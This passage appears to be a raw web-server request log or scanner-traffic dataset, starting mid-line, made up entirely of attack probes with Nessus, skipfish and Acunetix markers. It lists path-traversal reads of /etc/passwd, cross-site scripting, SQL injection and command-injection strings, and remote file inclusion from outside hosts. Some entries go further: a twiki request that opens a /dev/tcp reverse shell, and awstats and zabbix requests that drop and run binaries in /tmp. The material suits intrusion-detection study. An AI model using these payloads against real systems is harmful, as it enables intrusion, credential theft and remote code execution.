content=\"testvqcy=252\">\n/scripts/pmwiki.php\n/main.php?stuff=\"rm\\x09q42253935&rem\\x09\n/scripts/ui/login?user=nessus-1331904647\n/encodingdescriptions/\n/zmvq66jy.jspa?<script>cross_site_scripting.nasl</script>\n/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd\n/examples/jsp/cal/index.php?user_langue=../../../../../../../../../../etc/passwd\n/examples/jsp/cal/index.php?post=../config/password\n/scriptorium/\n/eesubscription_ps/\n/search.asp?search=\\\">&lt;script&gt;alert(vulnerable)&lt;/script&gt;\n/examples/jsp/jsp2/el/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/examples/jsp/num/athenareg.php?pass= ;id\n/main.php?stuff=\"|ping -w 8000 -n 1 4.3.2.1|rem \n/examples/jsp/checkbox/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'--\n/javascript/sources.exe\n/examples/jsp/cal/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/main.php?logout=\"ping;-w;8000;-n;1;1.2.3.4|rem;\n/examples/jsp/jsp2/jspx/data/fetch.php?page='\n/recordings/lang/index.php?file=/etc/passwd\n/javascript/xmlrpc.exe\n/j4rdyhw8.fts?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/javascript/osc.exe\n/ybz5rz7a.do?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/help.php?q='del q24159687 #\n/cgi-local/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/help.php?q=\"ver,>q11574297&rem,\n/cgi-bin/cvslog.cgi?file=<script>window.alert</script>\n/examples/jsp/colors/ftp/ftp.pl?dir=../../../../../../etc\n/l'hermitage prepare pour henry de valois/\n/examples/jsp/checkbox/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/help.php?q=';sleep\\x0911\\x09#\nftp://192.168.27.103/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/javascript/secure.exe\n/main.php?stuff=&ver\\x0c>q83537975&rem\\x0c\n/mainscript/\n/phpmyadmin/core/api.php?t_path_core=/etc/passwd\\x00\n/javascript/announcement.exe\n/cgibin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/vac1l5vm.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ver;>q11575615&rem;\n/help.php?q=\";rm\\x09q51344488\\x09#\n/manage-subscriptions/\n/examples/jsp/error/calendar.php?serverpath=/etc/passwd\\x00\n/argument_transcripts/\n/mv8wxfy9.nsf?<script>document.cookie=\"testrhbc=8184;\"</script>\n/examples/jsp/cal/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/javascript/anon.exe\n/top.php?stuff=\"\\x0adel\\x09q52122221\\x09#\n/scripts/index.php?op=default&date=200607' union select 1,1900403573,1,1,1,1,1,1,1,1--&blogid=1\n/cgi-915/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/6n7aacgg.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/..\\..\\..\\..\\..\\..\\temp\\temp.class\n/scriptingarchive/\n/rbec2ohx.do?<script>cross_site_scripting.nasl</script>\n/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>\n/1passwd/\n/cacti/embed/day.php?path=/etc/passwd\\x00\n/help.php?q=\"&ver\\xa0>q93363383&rem\\xa0\n/yec'hed/\n/examples/jsp/jsp2/el/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/9ko6m4c8.html?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/7uz3ok60.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b5xdqgz2.cfc?<script>cross_site_scripting.nasl</script>\n/index.php?config[\"sipssys\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/scripts/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/phpmyadmin/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--\n/scripts/ui/login?user=nessus-1331904328\n/top.php?stuff=';rm\\x09q48683432\\x09#\n/qb2xy9aw.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-sys/.htpasswd\n/<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/scriptomania by norouzi/\n/failure.asp?err_txt=text</b><script>alert(\"wvs-xss-magic-string-410166083338\");</script><b>text\n/examples/jsp/jsp2/el/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/rpc/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cgi/ppdscgi.exe\n/cgi-bin/phf.cgi?qalias=x\\x0a/bin/cat /etc/passwd\n/e9rx3ya4.html?<script>cross_site_scripting.nasl</script>\n/javascript/decrypted.exe\n/script/ident/identification.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/scripts/calendar.php?month=' union select 1,1,'1332009306','calendarix_month_sql_injection.nasl',1 #\n/zuihld5m.exe?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\\x0auname >q36414262 #\n/b4vng02k.idc?<script>document.cookie=\"testtrlh=3672;\"</script>\n/search.php?zoom_query=<script>alert(\\\"hello\\\")</script>\n/cgi-bin/print.php?what=article&id='\n/8t9v8k7x.cfm?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/scripts/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus\n/cgi-bin/search.jsp?q=%\"<script>alert(1331904373)</script>\n/cgi-bin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/webdav/phprun.php?cmd=wce.exe\n/fulldescription/\n/main.php?logout=uname\\x09>q57845343\\x09#\n/cgi-bin/index.php?module=<script>foo</script>\n/cgi-bin/.passwd\n/daddy's worst nightmare 2/\n/scripts/wrap\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010409')</script>\n/cgi-perl/fileseek.cgi?foot=;cat /etc/passwd&head=\n/oie504mr.jspa?<script>document.cookie=\"testtpby=7052;\"</script>\n/d44uk9h2.dll?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/jsp/colors/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/examples/jsp/error/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908861,1,1,1,1,1,1,1--&blogid=1\n/cgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd\n/en-us/i686v90l.pl?<script>document.cookie=\"testfutf=1550;\"</script>\n/examples/jsp/num/mapserv.exe?map=mapserver_detect.nasl.map\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+5f5+>>ctdn\n/newsarchive.php?path_to_script=http://cirt.net/rfiinc.txt??&cmd=ls\n/ny1b3qq4.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vwmg565s.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgibin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/ht8pn8uq.php?<script>cross_site_scripting.nasl</script>\n/help.php?q='&uname #\n/subscriptions.sh\n/hrttz9fj.php3?<script>document.cookie=\"testtbjy=7334;\"</script>\n/clockscriptlet/\n/main.php?stuff=\"rm\\x09q84368944\\x09#\n/examples/servlets/servlet/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/ap58k3ci.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/htbin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/javascript/gb.exe\n/vac1l5vm.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout='del\\x09q24187781\\x09#\n/lsoix5h3.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/u95h6ymu.html?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/javascript/device.exe\n/javascript/htpasswd.trace\n/examples/jsp/error/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/javascript/tr.exe\n/search.php?searchstring=<script>foo</script>\n/en-us/<script>cross_site_scripting.nasl</script>.do\n/zroo33l4.php3?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/main.php?logout=ver >q61134549&rem \n/examples/jsp/cal/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --\n/crosssitescripting/\n/0u75ldxq.cgi?<script>cross_site_scripting.nasl</script>\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/h4bi26jd.x?<script>document.cookie=\"testhrzx=1150;\"</script>\n/manager/includes/config.php?relative_script_path=http://xxxxxxx\n/scripts/syncml/index.php\n/test.php?evalme=eval($_server[http_x_pwzylftyuzjks]);\n/egaet53a.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?id='union/**/select/**/0,0,1645029612,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/fa8p8lr8.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/footer.inc.php?la_pow_by=<script>alert(414455594705)</script>\n/basilix.php3?requestid=dummy&password=secu&request_id[dummy]=../../../../etc/passwd&username=sec\n/jw64yq8u.fts?<script>document.cookie=\"testylfu=1313;\"</script>\n/javascript/views.exe\n/xlj7h65o.exe?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/phpmyadmin/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/subscriptions.do\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1</ foo>\n/scripts/getpassword.php\n/l4fz1dqw.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zln2hm2z.dll?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/0u75ldxq.x?<script>cross_site_scripting.nasl</script>\n/scripts/webmail.exe\n/modules.php?op=modload&name=guestbook&file=index&entry=<script>alert('vulnerable')</script>\n/en-us/account/index.php?chemin=../../../../../../..//etc\n/javascript/gsm.exe\n/scripture_gifts/\n/examples/jsp/sessions/mylog.html?screen=/etc/passwd\n/examples/jsp/cal/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/scripts/kfzqb5x87lvq.cgi\n/scripts/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/top.php?stuff=\";del q25742723 #\n/javascript/intl.exe\n/i2n4v4rl.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\n/javascript/srv.exe\n/help.php?q=\"&del q71917693&rem \n/?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+del+esbq\n/javascript/abcd.exe\n/scgi-bin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/script/\n/ju0u7kfo.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7uz3ok60.nsf?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/javascript/joe.exe\n/m2fpztty.asp?<script>cross_site_scripting.nasl</script>\n/bmeun223.jsp?<script>document.cookie=\"testhhwu=7044;\"</script>\n/i7prbs22.x?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/scripts/rihzp7swr3p6.asp\n/606wkcop.kspx?<script>cross_site_scripting.nasl</script>\n/j2kdmfw4.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/search.php?submit=true&search=');\n/lil'-pimp/\n/88ss.exe/\n/aj3pf49c.kspx?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/nuh3zirz.asp?<script>cross_site_scripting.nasl</script>\n/javascript/beans.exe\n/5qnlm5z2.cfm?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/uvazfs7p.cgi?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/twiki/bin/view/main/twikiusers?rev=8 `0<&206-;exec 206<>/dev/tcp/192.168.202.96/22943;sh <&206 >&206 2>&206`#\n/javascript/excalibur.exe\n/yef5f3d5.html?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/fa8p8lr8.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.aspx\n/javascript/.htpasswd.sfish/bogus\\x0askipfish-inject:bogus\n/readmore.php?config[\"sipssys\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/fo564rei.jsp?<script>cross_site_scripting.nasl</script>\n/manager/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/top.php?stuff=\"ver&rem;\n/zv8tv7h8.fts?<script>document.cookie=\"testcqwz=9752;\"</script>\n/eg2u8pbv.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/hw3.cgi?daysonly=0).system('id').(\n/ot-scripture/\n/script/fckeditor/editor/filemanager/browser/default/connectors/test.html\n/examples/jsp/jsp2/el/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/examples/servlets/servlet/shopper.cgi?newpage=../../../../../../etc/passwd\n/do_inscript1/\n/examples/jsp/colors/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/d5a5renl.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0307\\0203\\0211\\0340j\\0020pr\" >> /tmp/gjehhrjnrx0;echo|awstats769839.txt\n/npasswd/\n/yef5f3d5.exe?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/mailarticle.php?id='union select 0,0,0,0,0,0,username,password,0,0,0,0,0,0,0,0,0 from cc_admin/*\n/3hlysl2x.php?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 438328228--\n/examples/jsp/checkbox/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/phpmyadmin/search.php?searchstring=<script>foo</script>\n/en-us/i686v90l.kspx?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il??\n/bn857frh.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/core/editor.php?editor_insert_bottom=/etc/passwd\n/scripts/nckowqpd4zng.inc\n/internal.sws?../../../../../../../../winnt/win.ini\n/scripts/ggvfa_wichxq.inc\n/cgi-bin/dbmlparser.exe\n/0qhcnefz.jsp?<script>cross_site_scripting.nasl</script>\n/javascript/document.phtml\n/javascript/crm.exe\n/main.php?stuff=\"rm\\xa0q63696925&rem\\xa0\n/cacti/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/169okeyj.htm?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/u8yiqilu.asp?<script>document.cookie=\"testswjp=6010;\"</script>\n/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/././././././../../../../../etc/passwd\n/e9rx3ya4.cfm?<script>cross_site_scripting.nasl</script>\n/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd\n/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/fun.exe\n/examples/jsp/jsp2/jspx/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/main.php?stuff=&ver;>q39916466&rem;\n/b5xdqgz2.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/link.exe\n/javascript/donate.exe\n/scripts/6gl21a1hiz3s.cgi\n/recordings/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/javascript/sql.exe\n/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/zuihld5m.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/buoalakxhatu.shtml\n/jujgxwav.asp?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/examples/jsp/errorsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/examples/jsp/num/sgdynamo.exe?htname=<script>foo</script>\n/en-us/<script>cross_site_scripting.nasl</script>.cfc\n/recordings/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/help.php?q=\"rm\\x0cq43893615&rem\\x0c\n/examples/jsp/jsp2/el/index.php?show=/etc/passwd\n/j4drbkil.php3?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/cgi-bin/shoutbox.php?conf=../\n/help.php?q=\"ping,-w,8000,-n,1,4.3.2.1|rem,\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170\n/phpmyadmin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200\n/javascript/.passwd.trace\n/d5a5renl.pl?<script>cross_site_scripting.nasl</script>\n/outreach.exe\n/scripts/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/apavxugx.php?<script>document.cookie=\"testdnbh=5237;\"</script>\n/javascript/.htaccess/'\"\n/cgi-bin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/h5i6crm3.jsp?<script>document.cookie=\"testlihk=7070;\"</script>\n/en-us/account/port.php?proto=tcp'\n/j4rdyhw8.idc?<script>document.cookie=\"testrluj=1420;\"</script>\n/cgi-bin/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/g3w7y7u5.cfc?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/examples/jsp/jsp2/jspx/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/phpmyadmin/index.php?template=../../../loudblog/custom/config.php\\x00\n/help.php?q=&uname >q52514762 #\n/manager/catalog.php?action=category_show&id='\n/javascript/snoop.exe\n/webcgi/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=';uname >q74863224 #\n/phpmyadmin/minis.php?month=../../../../../../etc/passwd\n/cacti/more.php?id=1'\n/169okeyj.dll?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>\n/javascript/_private.exe\n/language.php?data_dir=/etc/passwd\\x00\n/scripts/index.pl\n/phpmyadmin/forumdisplay.php?fid=21\"><script>x</script>\n/cgi-bin/ssi//../../../../../../../etc/passwd\n/examples/jsp/error/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/javascript/foto.exe\n/606wkcop.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/main.php?logout=;sleep\\x0911\\x09#\n/cgi-bin/index.php?id=egyb16sayu'\n/examples/jsp/sessions/search.php?searchstring=<script>foo</script>\n/phpnews130-xss/\n/eg2u8pbv.jspa?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/bxtfwlgmsj0+>+/dev/null+&').\"]=1\n/<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/t3af3tdz.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htpasswd.sfish/`uname`\n/cacti/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/top.php?stuff=\"&del\\x09q38641956\\x09#\n/qczkquis.do?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/en-us/w4996nr0.kspx?<script>document.cookie=\"testttvs=7163;\"</script>\n/ap58k3ci.do?<script>cross_site_scripting.nasl</script>\n/7u1pb2xi.cfc?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/w4996nr0.x?<script>document.cookie=\"testttvs=7163;\"</script>\n/nuh3zirz.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testbfpq=3326;\"</script>\n/help.php?q=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331904438\n/examples/jsp/jsp2/jspx/js/scripts.php?load=/etc/passwd\\x00\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,359553433,0,0,0,0,0--\n/javascript/document.class\n/esmozg5d.jspa?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>\n/examples/jsp/colors/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/examples/jsp/sessions/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/examples/jsp/error/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/main.php?stuff=\"ping -w 11000 -n 1 4.3.2.1|rem \n/<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331919001\n/javascript/resolve.exe\n/jnt3f86c.do?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/main.php?logout=\"\\x0auname\\x09>q94356566\\x09#\n/examples/jsp/colors/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/examples/jsp/num/profil.php?id=1 <script>foo</script>\n/examples/jsp/num/download.php?language=/etc/passwd\\x00\n/n1afe1y6.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/7o5qp766.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iv5vkgam.jsp?<script>document.cookie=\"testfosd=94;\"</script>\n/t578vqea.pl?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd\\x00\n/scripts/gdxlwjnlsr6i.cgi\n/fc9t54l7.cfc?<script>document.cookie=\"testggad=2000;\"</script>\n/c:\\system32\\cmd.exe\n/examples/jsp/colors/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/o6ebbirj.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gy23xnjq.jspa?<script>cross_site_scripting.nasl</script>\n/help.php?q='\\x0ddel q58812882 #\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909358\n/l13b77e5.do?<script>document.cookie=\"testjvvf=7721;\"</script>\n/zroo33l4.pl?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/scripts-r0/\n/606wkcop.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/help.php?q=;uname >q31144684 #\n/t578vqea.php?<script>document.cookie=\"testsory=7676;\"</script>\n/raptor_passwd/\n/examples/jsp/checkbox/ftp/ftp.pl?dir=../../../../../../etc\n/en-us/33y9gcqq.cfc?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/cgi-bin/test.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/2aibfaczmac8?\n/scripts/d3z7yywpyeoa.shtml\n/scripts/admin/o12guest.mdb\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/bck.jsp\\x00\n/n9xlumt5.aspx?<script>cross_site_scripting.nasl</script>\n/dslpwt15.php?<script>document.cookie=\"testtkio=5454;\"</script>\n/top.php?stuff=\"&rm\\x09q26831864\\x09#\n/examples/jsp/checkbox/index.php?cid='\n/scriptablefields/\n/azcrfs8d.htm?<script>document.cookie=\"testjpdr=9205;\"</script>\n/help.php?q=\"rm\\x0bq49522765&rem\\x0b\n/examples/jsp/jsp2/el/ftp/ftp.pl?dir=../../../../../../etc\n/b1q8bywu.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349\n/scripts/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/main.php?frm_daynight=q33918212&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=\n/<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/main.php?stuff=';del\\x09q26313493\\x09#\n/bzuf9ozq.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/cgi-bin/cgi-test.exe\n/javascript/push.exe\n/script/gestion/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/<script>document.cookie=\"testtbbe=856;\"</script>\n/g8nu2yy7.jsp?<script>cross_site_scripting.nasl</script>\n/ttxssh2_100alpha2/\n/s7qus4g3.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/bpk_bsfe_4vq.cgi\n/top.php?stuff=\"|ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/iisadmpwd/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/7dbjwpw6.htm?<script>cross_site_scripting.nasl</script>\n/scripts/login_page.php\n/help.php?q=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/examples/jsp/cal/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n//</p><body><script src=http://www.example.com/test?rnd=q61315169></script><p>\n/miz4r5hz.htm?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/colors/sendtemp.pl?templ=../../../../../etc/passwd\n/help.php?q=\"&del,q17457396&rem,\n/shell-scripts/\n/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/showproduct.php?product=1'\n/javascript/realestate.exe\n/zmvq66jy.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/coldfusion.exe\n/help.php?q=\"|ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/weq93ppb.idc?<script>cross_site_scripting.nasl</script>\n/scripts/4rzefq7dsowk.php3\n/prxdocs/misc/prxrch.idq?citemplate=../../../../../../../../../../winnt/win.ini\n/scripts/index.php?id=0rop9yeuxw'\n/606wkcop.cfm?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/egaet53a.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,122468218,0,0,0,0,0--\n/examples/jsp/error/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/help.php?q='\\x0adel q56533456 #\n/lmw4r201.fts?<script>document.cookie=\"testwews=8477;\"</script>\n/examples/servlets/servlet/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/phpmyadmin/phpnews/sendtofriend.php?mid='1'\n/iv5vkgam.php?<script>document.cookie=\"testfosd=94;\"</script>\n/help.php?q='\\x0auname\\x09>q61575727\\x09#\n/examples/jsp/colors/kb.cgi?view='&lang=en\n/javascript/fbook.exe\n/javascript/personal.exe\n/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/fa8p8lr8.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;/./tmp/qcywjpzuja0 > /dev/null &;echo|awstats668269.txt\n/main.php?stuff=\"&ver >q89179194&rem 